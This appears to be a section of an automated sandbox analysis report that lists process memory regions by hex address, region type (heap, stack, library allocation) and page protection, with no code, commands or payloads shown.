17E80332000
heap
page read and write
29E52B45000
heap
page read and write
1EC5EDDC000
heap
page read and write
C000014000
direct allocation
page read and write
1EC44F9F000
heap
page read and write
7DA627F000
stack
page read and write
29E52715000
heap
page read and write
1AE026E1000
trusted library allocation
page read and write
E1EF67E000
stack
page read and write
17EE8545000
trusted library allocation
page read and write
201DAA03000
trusted library allocation
page read and write
24150AD0000
heap
page read and write
39375FE000
stack
page read and write
28138390000
heap
page read and write
28138315000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
71BC2ED000
stack
page read and write
201CA633000
trusted library allocation
page read and write
1EC5EE91000
heap
page read and write
71BC5FD000
stack
page read and write
29E5271E000
heap
page read and write
C0003BA000
direct allocation
page read and write
17EE58E0000
heap
page read and write
C0000B0000
direct allocation
page read and write
2813833A000
heap
page read and write
C000068000
direct allocation
page read and write
29E3A1D1000
trusted library allocation
page read and write
2A872B26000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
7DA5F7E000
stack
page read and write
179D1F90000
heap
page read and write
1EC4850A000
trusted library allocation
page read and write
7FFD9BC06000
trusted library allocation
page read and write
7DA62FE000
stack
page read and write
28138377000
heap
page read and write
7DA6F8F000
stack
page read and write
29E3880E000
heap
page read and write
1EC5F0B5000
heap
page read and write
2A858DBC000
heap
page read and write
1DF58210000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
2A85A750000
heap
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
2A874718000
unclassified section
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
2A873080000
direct allocation
page read and write
310FC7E000
stack
page read and write
17E802F8000
heap
page read and write
28139D80000
direct allocation
page read and write
2A85A7F9000
trusted library allocation
page read and write
1AE1A807000
heap
page execute and read and write
17E804A6000
heap
page read and write
2A85A580000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
17EE8E37000
trusted library allocation
page read and write
29E386C0000
heap
page read and write
201E2DE0000
heap
page execute and read and write
201CBFBC000
trusted library allocation
page read and write
28138337000
heap
page read and write
310FF3E000
stack
page read and write
2A85A586000
heap
page read and write
2A85A58E000
heap
page read and write
E1EEDB2000
stack
page read and write
E1F060E000
stack
page read and write
29E52BB8000
heap
page read and write
17EEA579000
trusted library allocation
page read and write
28138312000
heap
page read and write
1AE020B0000
heap
page read and write
310FAFD000
stack
page read and write
29E3B15D000
trusted library allocation
page read and write
FAB5E7E000
stack
page read and write
201CA8D7000
heap
page read and write
28138250000
heap
page read and write
201CBAED000
trusted library allocation
page read and write
1EC44F49000
heap
page read and write
201CBFAD000
trusted library allocation
page read and write
17EE7350000
heap
page execute and read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
281384F0000
heap
page read and write
24150AF0000
heap
page read and write
28138280000
heap
page read and write
2A85A4C0000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
7FFD9BCFC000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
7FFD9BD30000
trusted library allocation
page read and write
201CBFB0000
trusted library allocation
page read and write
17EE5A95000
heap
page read and write
201CA783000
heap
page read and write
1EC44F89000
heap
page read and write
2813BD60000
direct allocation
page read and write
1EC48293000
trusted library allocation
page read and write
7DF499370000
trusted library allocation
page execute and read and write
1EC482AE000
trusted library allocation
page read and write
17EE5AD6000
heap
page read and write
C0002C4000
direct allocation
page read and write
FAB5EFE000
stack
page read and write
17E802E6000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
C0000C6000
direct allocation
page read and write
C000022000
direct allocation
page read and write
C00036C000
direct allocation
page read and write
1EC488D7000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
2813BB00000
direct allocation
page read and write
2A85A9A6000
trusted library allocation
page read and write
2066B2B0000
heap
page read and write
29E3A242000
trusted library allocation
page read and write
2813830A000
heap
page read and write
17EEA4A1000
trusted library allocation
page read and write
2813835E000
heap
page read and write
7DA5DFE000
stack
page read and write
2A8743AB000
unclassified section
page read and write
28138311000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
29E387F6000
heap
page read and write
C000438000
direct allocation
page read and write
1EC44E70000
heap
page read and write
1AE02AB6000
trusted library allocation
page read and write
39381CC000
stack
page read and write
2A858A6D000
heap
page read and write
28138337000
heap
page read and write
7FFD9BDC0000
trusted library allocation
page read and write
1EC44FCB000
heap
page read and write
2A8743E0000
unclassified section
page write copy
7FFD9BCC0000
trusted library allocation
page read and write
C0002FE000
direct allocation
page read and write
7DA5EFF000
stack
page read and write
207C4310000
heap
page read and write
17EEA489000
trusted library allocation
page read and write
24150D64000
heap
page read and write
1EC47B46000
trusted library allocation
page read and write
201C8F40000
trusted library allocation
page read and write
29E3A3F8000
trusted library allocation
page read and write
C000082000
direct allocation
page read and write
E1EF4F8000
stack
page read and write
17EE7340000
heap
page readonly
2A8799C0000
direct allocation
page read and write
29E38A24000
heap
page read and write
1EC5EE88000
heap
page read and write
C00002F000
direct allocation
page read and write
1AE0273D000
trusted library allocation
page read and write
C000247000
direct allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
39374F8000
stack
page read and write
29E52AE0000
heap
page read and write
2A873850000
direct allocation
page read and write
C00047E000
direct allocation
page read and write
28138381000
heap
page read and write
FF0714D000
stack
page read and write
201CC1ED000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page execute and read and write
201CA7EF000
heap
page read and write
1EC5EDC0000
heap
page read and write
17E171C0000
heap
page read and write
2813BD6E000
direct allocation
page read and write
1EC44F65000
heap
page read and write
2813BD40000
direct allocation
page read and write
201E2FB0000
heap
page read and write
29E3A9D3000
trusted library allocation
page read and write
A7567F6000
stack
page read and write
C0000D2000
direct allocation
page read and write
1EC5F100000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
179D1E90000
heap
page read and write
311003E000
stack
page read and write
17EEA475000
trusted library allocation
page read and write
C000434000
direct allocation
page read and write
2813832A000
heap
page read and write
17EEA49F000
trusted library allocation
page read and write
C000470000
direct allocation
page read and write
1EC482E6000
trusted library allocation
page read and write
201C8B30000
heap
page read and write
1AE1A7A3000
heap
page read and write
E1F078E000
stack
page read and write
201CBF98000
trusted library allocation
page read and write
C0003DF000
direct allocation
page read and write
201C8F60000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
201C8CEB000
heap
page read and write
28138312000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
29E52BC4000
heap
page read and write
17E80442000
heap
page read and write
1AE027DE000
trusted library allocation
page read and write
1F984420000
heap
page read and write
16107F20000
heap
page read and write
7FFD9BB87000
trusted library allocation
page read and write
17E171CE000
heap
page read and write
E1EF27F000
stack
page read and write
2813833F000
heap
page read and write
17EE7393000
trusted library allocation
page read and write
C00037C000
direct allocation
page read and write
201CC220000
trusted library allocation
page read and write
2A86BBA7000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
C0003C2000
direct allocation
page read and write
24150B3C000
heap
page read and write
C000468000
direct allocation
page read and write
17EE74D0000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1EC5F080000
heap
page read and write
21EF0BD0000
heap
page read and write
28139DA0000
heap
page read and write
2A86A781000
trusted library allocation
page read and write
2A85AAFB000
trusted library allocation
page read and write
1EC44E74000
heap
page read and write
C000058000
direct allocation
page read and write
1EC44F5E000
heap
page read and write
352BFF000
stack
page read and write
B842CFF000
stack
page read and write
2A85AB25000
trusted library allocation
page read and write
FAB5B63000
stack
page read and write
17E802DC000
heap
page read and write
17E8048F000
heap
page read and write
1EC47062000
trusted library allocation
page read and write
2A872D84000
heap
page read and write
7FFD9BB5A000
trusted library allocation
page read and write
7FFD9B9A4000
trusted library allocation
page read and write
C000482000
direct allocation
page read and write
C00045E000
direct allocation
page read and write
17EE84D0000
trusted library allocation
page read and write
7FFD9BA56000
trusted library allocation
page read and write
2A872AE8000
heap
page read and write
17EEA519000
trusted library allocation
page read and write
2A858DB4000
heap
page read and write
E1EF17F000
stack
page read and write
1AE0079D000
heap
page read and write
1F7E9230000
heap
page read and write
C0000CE000
direct allocation
page read and write
1EC44F26000
heap
page read and write
201CAA56000
trusted library allocation
page read and write
201C8CC3000
heap
page read and write
201C8CF7000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
28138337000
heap
page read and write
1EA08F38000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
393834E000
stack
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
There are 1350 hidden memdumps, click here to show them.